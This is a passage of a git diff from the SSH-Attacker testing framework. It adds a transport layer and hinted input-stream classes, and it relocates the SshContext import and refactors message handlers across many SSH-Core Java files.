LogManager.getLogger(); + private SshContext context; + + public TransportLayer(SshContext context) { + super(ImplementedLayers.TransportLayer); + this.context = context; + } + + @Override + public LayerProcessingResult sendConfiguration() throws IOException { + /*LayerConfiguration configuration = getLayerConfiguration(); + if (configuration != null && !configuration.getContainerList().isEmpty()) { + for (ProtocolMessage ssl2message : configuration.getContainerList()) { + ProtocolMessagePreparator preparator = ssl2message.getPreparator(context); + preparator.prepare(); + preparator.afterPrepare(); + ssl2message.getHandler(context).adjustContext(ssl2message); + ProtocolMessageSerializer serializer = ssl2message.getSerializer(context); + byte[] serializedMessage = serializer.serialize(); + ssl2message.setCompleteResultingMessage(serializedMessage); + ssl2message.getHandler(context).adjustContextAfterSerialize(ssl2message); + ssl2message.getHandler(context).updateDigest(ssl2message, true); + getLowerLayer() + .sendData( + new RecordLayerHint(ssl2message.getProtocolMessageType()), + serializedMessage); + addProducedContainer(ssl2message); + } + } + return getLayerResult();*/ + + LayerConfiguration configuration = getLayerConfiguration(); + if (configuration != null && configuration.getContainerList() != null) { + for (Session session : configuration.getContainerList()) { + if (containerAlreadyUsedByHigherLayer(session) /*|| skipEmptyRecords(session)*/) { + continue; + } + ProtocolMessageType contentType = session.getContentMessageType(); + if (contentType == null) { + contentType = ProtocolMessageType.UNKNOWN; + LOGGER.warn( + "Sending record without a LayerProcessing hint. Using \"UNKNOWN\" as the type"); + } + /*if (encryptor.getRecordCipher(writeEpoch).getState().getVersion().isDTLS() + && session.getEpoch() == null) { + session.setEpoch(writeEpoch); + }*/ + if (session.getCleanProtocolMessageBytes() == null) { + session.setCleanProtocolMessageBytes(new byte[0]); + } + SessionPreparator preparator = + session.getSessionPreparator( + context, /* encryptor, compressor, */ contentType); + preparator.prepare(); + preparator.afterPrepare(); + SessionSerializer serializer = session.getSessionSerializer(); + byte[] serializedMessage = serializer.serialize(); + session.setCompleteRecordBytes(serializedMessage); + getLowerLayer().sendData(null, serializedMessage); + addProducedContainer(session); + } + } + return getLayerResult(); + } + + @Override + public LayerProcessingResult sendData(LayerProcessingHint hint, byte[] additionalData) + throws IOException { + return sendConfiguration(); + } + + @Override + public LayerProcessingResult receiveData() { + + /*try { + int messageLength = 0; + byte paddingLength = 0; + byte[] totalHeader; + HintedInputStream dataStream = null; + SSL2MessageType messageType; + try { + + dataStream = getLowerLayer().getDataStream(); + totalHeader = dataStream.readNBytes(SSL2ByteLength.LENGTH); + + if (SSL2TotalHeaderLengths.isNoPaddingHeader(totalHeader[0])) { + messageLength = resolveUnpaddedMessageLength(totalHeader); + paddingLength = 0x00; + } else { + messageLength = resolvePaddedMessageLength(totalHeader); + paddingLength = dataStream.readByte(); + } + messageType = SSL2MessageType.getMessageType(dataStream.readByte()); + } catch (IOException e) { + LOGGER.warn( + "Failed to parse SSL2 message header, parsing as unknown SSL2 message", e); + messageType = SSL2MessageType.SSL_UNKNOWN; + } + + SSL2Message message = null; + + switch (messageType) { + case SSL_CLIENT_HELLO: + message = new SSL2ClientHelloMessage(); + break; + case SSL_CLIENT_MASTER_KEY: + message = new SSL2ClientMasterKeyMessage(); + break; + case SSL_SERVER_VERIFY: + message = new SSL2ServerVerifyMessage(); + break; + case SSL_SERVER_HELLO: + message = new SSL2ServerHelloMessage(); + break; + default: + message = new UnknownSSL2Message(); + } + + message.setType((byte) messageType.getType()); + message.setMessageLength(messageLength); + message.setPaddingLength((int) paddingLength); + readDataContainer(message, context); + + } catch (TimeoutException ex) { + LOGGER.debug(ex); + } catch (EndOfStreamException ex) { + LOGGER.debug("Reached end of stream, cannot parse more messages", ex); + } + + return getLayerResult();*/ + throw new UnsupportedOperationException("Not supported yet."); + } + + /*private static int resolvePaddedMessageLength(final byte[] totalHeaderLength) { + return (totalHeaderLength[0] & SSL2TotalHeaderLengths.ALL_BUT_TWO_BIT.getValue()) << 8 + | totalHeaderLength[1]; + } + + private static int resolveUnpaddedMessageLength(final byte[] totalHeaderLength) { + return (totalHeaderLength[0] & SSL2TotalHeaderLengths.ALL_BUT_ONE_BIT.getValue()) << 8 + | totalHeaderLength[1]; + }*/ + + @Override + public void receiveMoreDataForHint(LayerProcessingHint hint) throws IOException { + try { + HintedInputStream dataStream = null; + dataStream = getLowerLayer().getDataStream(); + if (dataStream.getHint() == null) { + LOGGER.warn( + "The Transport-layer requires a processing hint. E.g. a record type. Parsing as an unknown fragment"); + currentInputStream = new HintedLayerInputStream(null, this); + currentInputStream.extendStream(dataStream.readAllBytes()); + } else if (dataStream.getHint() instanceof RecordLayerHint) { + RecordLayerHint tempHint = (RecordLayerHint) dataStream.getHint(); + /*if (tempHint.getType() == ProtocolMessageType.HANDSHAKE) { + DtlsHandshakeMessageFragment fragment = new DtlsHandshakeMessageFragment(); + fragment.setEpoch(tempHint.getEpoch()); + DtlsHandshakeMessageFragmentParser parser = + fragment.getParser( + context, + new ByteArrayInputStream( + dataStream.readChunk(dataStream.available()))); + parser.parse(fragment); + fragment.setCompleteResultingMessage( + fragment.getSerializer(context).serialize()); + fragmentManager.addMessageFragment(fragment); + List uninterpretedMessageFragments = + fragmentManager.getOrderedCombinedUninterpretedMessageFragments( + true, false); + // run until we received a complete fragment + if (!uninterpretedMessageFragments.isEmpty()) { + DtlsHandshakeMessageFragment uninterpretedMessageFragment = + uninterpretedMessageFragments.get(0); + addProducedContainer(uninterpretedMessageFragment); + RecordLayerHint currentHint = + new RecordLayerHint( + uninterpretedMessageFragment.getProtocolMessageType(), + uninterpretedMessageFragment + .getMessageSequence() + .getValue()); + byte type = uninterpretedMessageFragment.getType().getValue(); + byte[] content = + uninterpretedMessageFragment.getMessageContent().getValue(); + byte[] message = + ArrayConverter.concatenate( + new byte[] {type}, + ArrayConverter.intToBytes( + content.length, + HandshakeByteLength.MESSAGE_LENGTH_FIELD), + content); + if (desiredHint == null || currentHint.equals(desiredHint)) { + if (currentInputStream == null) { + currentInputStream = new HintedLayerInputStream(currentHint, this); + } else { + currentInputStream.setHint(currentHint); + } + currentInputStream.extendStream(message); + } else { + if (nextInputStream == null) { + nextInputStream = new HintedLayerInputStream(currentHint, this); + } else { + nextInputStream.setHint(currentHint); + } + nextInputStream.extendStream(message); + } + } else { + receiveMoreDataForHint(desiredHint); + } + } else { + currentInputStream = new HintedLayerInputStream(tempHint, this); + currentInputStream.extendStream(dataStream.readChunk(dataStream.available())); + }*/ + } + } catch (TimeoutException ex) { + LOGGER.debug(ex); + throw ex; + } catch (EndOfStreamException ex) { + LOGGER.debug("Reached end of stream, cannot parse more dtls fragments", ex); + throw ex; + } + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/stream/HintedInputStream.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/stream/HintedInputStream.java new file mode 100644 index 000000000..dacd3a700 --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/stream/HintedInputStream.java @@ -0,0 +1,69 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2023 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.layer.stream; + +import de.rub.nds.modifiablevariable.util.ArrayConverter; +import de.rub.nds.sshattacker.core.exceptions.EndOfStreamException; +import de.rub.nds.sshattacker.core.exceptions.ParserException; +import de.rub.nds.sshattacker.core.layer.hints.LayerProcessingHint; +import java.io.IOException; +import java.io.InputStream; + +/** + * InputStream that contains a LayerProcessingHint. Also provides methods useful when parsing data + * from byteArrays. + */ +public abstract class HintedInputStream extends InputStream { + + private LayerProcessingHint hint; + + public HintedInputStream(LayerProcessingHint hint) { + this.hint = hint; + } + + public LayerProcessingHint getHint() { + return hint; + } + + public byte readByte() throws IOException { + return (byte) read(); + } + + public int readInt(int size) throws IOException { + if (size < 0 || size > 4) { + throw new ParserException("Cannot read Integer of size " + size); + } + byte[] readChunk = readChunk(size); + return ArrayConverter.bytesToInt(readChunk); + } + + public byte[] readChunk(int size) throws IOException { + if (size == 0) { + return new byte[0]; + } + byte[] chunk = new byte[size]; + int read = read(chunk); + if (read != size) { + throw new EndOfStreamException( + "Could not read " + + size + + " bytes from the stream. Only " + + read + + " bytes available"); + } + return chunk; + } + + protected abstract InputStream getDataSource(); + + public abstract void extendStream(byte[] bytes); + + public void setHint(LayerProcessingHint hint) { + this.hint = hint; + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/stream/HintedInputStreamAdapterStream.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/stream/HintedInputStreamAdapterStream.java new file mode 100644 index 000000000..4fe955e60 --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/stream/HintedInputStreamAdapterStream.java @@ -0,0 +1,48 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2023 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.layer.stream; + +import de.rub.nds.sshattacker.core.layer.hints.LayerProcessingHint; +import java.io.IOException; +import java.io.InputStream; + +/** + * HintedInputStream, that wraps around another Stream (used in the {@link + * de.rub.nds.tlsattacker.core.layer.impl.TcpLayer} and the {@link + * de.rub.nds.tlsattacker.core.layer.impl.UdpLayer} + */ +public class HintedInputStreamAdapterStream extends HintedInputStream { + + private InputStream stream; + + public HintedInputStreamAdapterStream(LayerProcessingHint hint, InputStream stream) { + super(hint); + this.stream = stream; + } + + @Override + protected InputStream getDataSource() { + return stream; + } + + @Override + public int read() throws IOException { + return stream.read(); + } + + @Override + public int available() throws IOException { + return stream.available(); + } + + @Override + public void extendStream(byte[] bytes) { + throw new UnsupportedOperationException( + "HintedInputStreamAdapterStream is not extendable."); + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/stream/HintedLayerInputStream.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/stream/HintedLayerInputStream.java new file mode 100644 index 000000000..e499285fb --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/stream/HintedLayerInputStream.java @@ -0,0 +1,70 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2023 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.layer.stream; + +import de.rub.nds.sshattacker.core.layer.ProtocolLayer; +import de.rub.nds.sshattacker.core.layer.hints.LayerProcessingHint; +import java.io.ByteArrayInputStream; +import java.io.ByteArrayOutputStream; +import java.io.IOException; +import java.io.InputStream; + +/** + * The HintedLayerInputStream is assigned to a layer. When reading data from it, the stream tries to + * receive more data using the layer it is assigned to. + */ +public class HintedLayerInputStream extends HintedInputStream { + + private final ProtocolLayer layer; + + private ByteArrayInputStream stream = new ByteArrayInputStream(new byte[0]); + + public HintedLayerInputStream(LayerProcessingHint hint, ProtocolLayer layer) { + super(hint); + this.layer = layer; + } + + /** + * Return data from the underlaying stream. If none is present, write more data into the stream + * using the layer. + */ + @Override + public int read() throws IOException { + if (stream.available() > 0) { + return stream.read(); + } else { + layer.receiveMoreDataForHint(getHint()); + // either the stream is now filled, or we ran into a timeout + // or the next stream is available + return stream.read(); + } + } + + @Override + public int available() throws IOException { + return stream.available(); + } + + @Override + protected InputStream getDataSource() { + return stream; + } + + /** Extends the current data in the stream with the given data. */ + @Override + public void extendStream(byte[] bytes) { + try { + ByteArrayOutputStream outStream = new ByteArrayOutputStream(); + stream.transferTo(outStream); + outStream.write(bytes); + stream = new ByteArrayInputStream(outStream.toByteArray()); + } catch (IOException ex) { + throw new RuntimeException("IO Exception from ByteArrayStream"); + } + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/cipher/PacketChaCha20Poly1305Cipher.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/cipher/PacketChaCha20Poly1305Cipher.java index 505d19a47..4da8ebde5 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/cipher/PacketChaCha20Poly1305Cipher.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/cipher/PacketChaCha20Poly1305Cipher.java @@ -12,11 +12,11 @@ import de.rub.nds.sshattacker.core.crypto.cipher.AbstractCipher; import de.rub.nds.sshattacker.core.crypto.cipher.CipherFactory; import de.rub.nds.sshattacker.core.exceptions.CryptoException; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.packet.BinaryPacket; import de.rub.nds.sshattacker.core.packet.BlobPacket; import de.rub.nds.sshattacker.core.packet.PacketCryptoComputations; import de.rub.nds.sshattacker.core.packet.cipher.keys.KeySet; -import de.rub.nds.sshattacker.core.state.SshContext; import java.util.Arrays; import java.util.stream.Collectors; import java.util.stream.Stream; diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/cipher/PacketCipher.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/cipher/PacketCipher.java index 7e1d5c151..f45fba4a5 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/cipher/PacketCipher.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/cipher/PacketCipher.java @@ -9,11 +9,11 @@ import de.rub.nds.sshattacker.core.constants.*; import de.rub.nds.sshattacker.core.exceptions.CryptoException; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.packet.BinaryPacket; import de.rub.nds.sshattacker.core.packet.BlobPacket; import de.rub.nds.sshattacker.core.packet.cipher.keys.KeySet; import de.rub.nds.sshattacker.core.protocol.common.Parser; -import de.rub.nds.sshattacker.core.state.SshContext; import de.rub.nds.tlsattacker.transport.ConnectionEndType; public abstract class PacketCipher { diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/cipher/PacketCipherFactory.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/cipher/PacketCipherFactory.java index 82f9161bc..6bcc89e68 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/cipher/PacketCipherFactory.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/cipher/PacketCipherFactory.java @@ -11,8 +11,8 @@ import de.rub.nds.sshattacker.core.constants.EncryptionAlgorithm; import de.rub.nds.sshattacker.core.constants.EncryptionMode; import de.rub.nds.sshattacker.core.constants.MacAlgorithm; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.packet.cipher.keys.KeySet; -import de.rub.nds.sshattacker.core.state.SshContext; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/cipher/PacketGCMCipher.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/cipher/PacketGCMCipher.java index 2a72fedda..42398613d 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/cipher/PacketGCMCipher.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/cipher/PacketGCMCipher.java @@ -12,11 +12,11 @@ import de.rub.nds.sshattacker.core.crypto.cipher.AbstractCipher; import de.rub.nds.sshattacker.core.crypto.cipher.CipherFactory; import de.rub.nds.sshattacker.core.exceptions.CryptoException; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.packet.BinaryPacket; import de.rub.nds.sshattacker.core.packet.BlobPacket; import de.rub.nds.sshattacker.core.packet.PacketCryptoComputations; import de.rub.nds.sshattacker.core.packet.cipher.keys.KeySet; -import de.rub.nds.sshattacker.core.state.SshContext; import de.rub.nds.sshattacker.core.util.Converter; import java.util.Arrays; import java.util.stream.Collectors; diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/cipher/PacketMacedCipher.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/cipher/PacketMacedCipher.java index c82101203..f7cc604a7 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/cipher/PacketMacedCipher.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/cipher/PacketMacedCipher.java @@ -14,12 +14,12 @@ import de.rub.nds.sshattacker.core.crypto.mac.AbstractMac; import de.rub.nds.sshattacker.core.crypto.mac.MacFactory; import de.rub.nds.sshattacker.core.exceptions.CryptoException; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.packet.AbstractPacket; import de.rub.nds.sshattacker.core.packet.BinaryPacket; import de.rub.nds.sshattacker.core.packet.BlobPacket; import de.rub.nds.sshattacker.core.packet.PacketCryptoComputations; import de.rub.nds.sshattacker.core.packet.cipher.keys.KeySet; -import de.rub.nds.sshattacker.core.state.SshContext; import java.math.BigInteger; import java.security.NoSuchAlgorithmException; import java.util.Arrays; diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/cipher/keys/KeySetGenerator.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/cipher/keys/KeySetGenerator.java index 8dced572d..acf0cccb3 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/cipher/keys/KeySetGenerator.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/cipher/keys/KeySetGenerator.java @@ -9,7 +9,7 @@ import de.rub.nds.sshattacker.core.constants.KeyDerivationLabels; import de.rub.nds.sshattacker.core.crypto.KeyDerivation; -import de.rub.nds.sshattacker.core.state.SshContext; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.util.Converter; import de.rub.nds.sshattacker.core.workflow.chooser.Chooser; import org.apache.logging.log4j.LogManager; diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/crypto/PacketDecryptor.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/crypto/PacketDecryptor.java index 36c8dedf3..8dec11181 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/crypto/PacketDecryptor.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/crypto/PacketDecryptor.java @@ -9,11 +9,11 @@ import de.rub.nds.sshattacker.core.constants.CipherMode; import de.rub.nds.sshattacker.core.exceptions.CryptoException; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.packet.BinaryPacket; import de.rub.nds.sshattacker.core.packet.BlobPacket; import de.rub.nds.sshattacker.core.packet.cipher.PacketCipher; import de.rub.nds.sshattacker.core.packet.cipher.PacketCipherFactory; -import de.rub.nds.sshattacker.core.state.SshContext; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/crypto/PacketEncryptor.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/crypto/PacketEncryptor.java index 095b87f07..871ffd827 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/crypto/PacketEncryptor.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/crypto/PacketEncryptor.java @@ -9,11 +9,11 @@ import de.rub.nds.sshattacker.core.constants.CipherMode; import de.rub.nds.sshattacker.core.exceptions.CryptoException; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.packet.BinaryPacket; import de.rub.nds.sshattacker.core.packet.BlobPacket; import de.rub.nds.sshattacker.core.packet.cipher.PacketCipher; import de.rub.nds.sshattacker.core.packet.cipher.PacketCipherFactory; -import de.rub.nds.sshattacker.core.state.SshContext; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/layer/AbstractPacketLayer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/layer/AbstractPacketLayer.java index adf719923..2aebc2ec1 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/layer/AbstractPacketLayer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/layer/AbstractPacketLayer.java @@ -11,6 +11,7 @@ import de.rub.nds.sshattacker.core.constants.CompressionAlgorithm; import de.rub.nds.sshattacker.core.exceptions.CryptoException; import de.rub.nds.sshattacker.core.exceptions.ParserException; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.packet.AbstractPacket; import de.rub.nds.sshattacker.core.packet.cipher.PacketCipher; import de.rub.nds.sshattacker.core.packet.cipher.PacketCipherFactory; @@ -22,7 +23,6 @@ import de.rub.nds.sshattacker.core.packet.crypto.PacketEncryptor; import de.rub.nds.sshattacker.core.packet.preparator.AbstractPacketPreparator; import de.rub.nds.sshattacker.core.packet.serializer.AbstractPacketSerializer; -import de.rub.nds.sshattacker.core.state.SshContext; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/layer/BinaryPacketLayer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/layer/BinaryPacketLayer.java index ac355cdc9..e26cb4b8a 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/layer/BinaryPacketLayer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/layer/BinaryPacketLayer.java @@ -8,12 +8,12 @@ package de.rub.nds.sshattacker.core.packet.layer; import de.rub.nds.sshattacker.core.exceptions.ParserException; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.packet.AbstractPacket; import de.rub.nds.sshattacker.core.packet.BinaryPacket; import de.rub.nds.sshattacker.core.packet.BlobPacket; import de.rub.nds.sshattacker.core.packet.parser.BinaryPacketParser; import de.rub.nds.sshattacker.core.packet.parser.BlobPacketParser; -import de.rub.nds.sshattacker.core.state.SshContext; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/layer/BlobPacketLayer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/layer/BlobPacketLayer.java index 3ce071db6..1eaeab0e4 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/layer/BlobPacketLayer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/layer/BlobPacketLayer.java @@ -8,9 +8,9 @@ package de.rub.nds.sshattacker.core.packet.layer; import de.rub.nds.sshattacker.core.exceptions.ParserException; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.packet.BlobPacket; import de.rub.nds.sshattacker.core.packet.parser.BlobPacketParser; -import de.rub.nds.sshattacker.core.state.SshContext; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/layer/PacketLayerFactory.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/layer/PacketLayerFactory.java index 983058cc1..69ab3448a 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/layer/PacketLayerFactory.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/layer/PacketLayerFactory.java @@ -8,7 +8,7 @@ package de.rub.nds.sshattacker.core.packet.layer; import de.rub.nds.sshattacker.core.constants.PacketLayerType; -import de.rub.nds.sshattacker.core.state.SshContext; +import de.rub.nds.sshattacker.core.layer.context.SshContext; public class PacketLayerFactory { diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/handler/UserAuthBannerMessageHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/handler/UserAuthBannerMessageHandler.java index 142b777bf..26aa1f54f 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/handler/UserAuthBannerMessageHandler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/handler/UserAuthBannerMessageHandler.java @@ -7,12 +7,9 @@ */ package de.rub.nds.sshattacker.core.protocol.authentication.handler; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.authentication.message.UserAuthBannerMessage; -import de.rub.nds.sshattacker.core.protocol.authentication.parser.UserAuthBannerMessageParser; -import de.rub.nds.sshattacker.core.protocol.authentication.preparator.UserAuthBannerMessagePreparator; -import de.rub.nds.sshattacker.core.protocol.authentication.serializer.UserAuthBannerMessageSerializer; import de.rub.nds.sshattacker.core.protocol.common.*; -import de.rub.nds.sshattacker.core.state.SshContext; public class UserAuthBannerMessageHandler extends SshMessageHandler { @@ -20,15 +17,16 @@ public UserAuthBannerMessageHandler(SshContext context) { super(context); } - public UserAuthBannerMessageHandler(SshContext context, UserAuthBannerMessage message) { + /*public UserAuthBannerMessageHandler(SshContext context, UserAuthBannerMessage message) { super(context, message); - } + }*/ @Override - public void adjustContext() { + public void adjustContext(UserAuthBannerMessage message) { // TODO: Handle UserAuthBannerMessage } + /* @Override public UserAuthBannerMessageParser getParser(byte[] array) { return new UserAuthBannerMessageParser(array); @@ -48,4 +46,6 @@ public UserAuthBannerMessagePreparator getPreparator() { public UserAuthBannerMessageSerializer getSerializer() { return new UserAuthBannerMessageSerializer(message); } + + */ } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/handler/UserAuthFailureMessageHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/handler/UserAuthFailureMessageHandler.java index aca6d31d1..aaf8b2b36 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/handler/UserAuthFailureMessageHandler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/handler/UserAuthFailureMessageHandler.java @@ -7,12 +7,9 @@ */ package de.rub.nds.sshattacker.core.protocol.authentication.handler; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.authentication.message.UserAuthFailureMessage; -import de.rub.nds.sshattacker.core.protocol.authentication.parser.UserAuthFailureMessageParser; -import de.rub.nds.sshattacker.core.protocol.authentication.preparator.UserAuthFailureMessagePreparator; -import de.rub.nds.sshattacker.core.protocol.authentication.serializer.UserAuthFailureMessageSerializer; import de.rub.nds.sshattacker.core.protocol.common.*; -import de.rub.nds.sshattacker.core.state.SshContext; public class UserAuthFailureMessageHandler extends SshMessageHandler { @@ -20,32 +17,12 @@ public UserAuthFailureMessageHandler(SshContext context) { super(context); } - public UserAuthFailureMessageHandler(SshContext context, UserAuthFailureMessage message) { + /*public UserAuthFailureMessageHandler(SshContext context, UserAuthFailureMessage message) { super(context, message); - } + }*/ @Override - public void adjustContext() { + public void adjustContext(UserAuthFailureMessage message) { // TODO: Handle UserAuthFailureMessage } - - @Override - public UserAuthFailureMessageParser getParser(byte[] array) { - return new UserAuthFailureMessageParser(array); - } - - @Override - public UserAuthFailureMessageParser getParser(byte[] array, int startPosition) { - return new UserAuthFailureMessageParser(array, startPosition); - } - - @Override - public UserAuthFailureMessagePreparator getPreparator() { - return new UserAuthFailureMessagePreparator(context.getChooser(), message); - } - - @Override - public UserAuthFailureMessageSerializer getSerializer() { - return new UserAuthFailureMessageSerializer(message); - } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/handler/UserAuthHostbasedMessageHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/handler/UserAuthHostbasedMessageHandler.java index 41ada6286..e5ca7dc52 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/handler/UserAuthHostbasedMessageHandler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/handler/UserAuthHostbasedMessageHandler.java @@ -13,12 +13,9 @@ import de.rub.nds.sshattacker.core.crypto.signature.*; import de.rub.nds.sshattacker.core.crypto.util.PublicKeyHelper; import de.rub.nds.sshattacker.core.exceptions.CryptoException; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.authentication.message.UserAuthHostbasedMessage; -import de.rub.nds.sshattacker.core.protocol.authentication.parser.UserAuthHostbasedMessageParser; -import de.rub.nds.sshattacker.core.protocol.authentication.preparator.UserAuthHostbasedMessagePreparator; -import de.rub.nds.sshattacker.core.protocol.authentication.serializer.UserAuthHostbasedMessageSerializer; import de.rub.nds.sshattacker.core.protocol.common.SshMessageHandler; -import de.rub.nds.sshattacker.core.state.SshContext; import de.rub.nds.sshattacker.core.util.Converter; import java.nio.charset.StandardCharsets; @@ -28,16 +25,16 @@ public UserAuthHostbasedMessageHandler(SshContext context) { super(context); } - public UserAuthHostbasedMessageHandler(SshContext context, UserAuthHostbasedMessage message) { + /*public UserAuthHostbasedMessageHandler(SshContext context, UserAuthHostbasedMessage message) { super(context, message); - } + }*/ @Override - public void adjustContext() { - checkSignature(); + public void adjustContext(UserAuthHostbasedMessage message) { + checkSignature(message); } - public void checkSignature() { + public void checkSignature(UserAuthHostbasedMessage message) { if (message.getHostKeyBytes() != null && message.getHostKeyBytes().getValue() != null) { PublicKeyAlgorithm hostKeyAlgorithm = PublicKeyAlgorithm.fromName(message.getPubKeyAlgorithm().getValue()); @@ -51,7 +48,7 @@ public void checkSignature() { VerifyingSignature verifyingSignature = SignatureFactory.getVerifyingSignature(hostKeyAlgorithm, hostKey); if 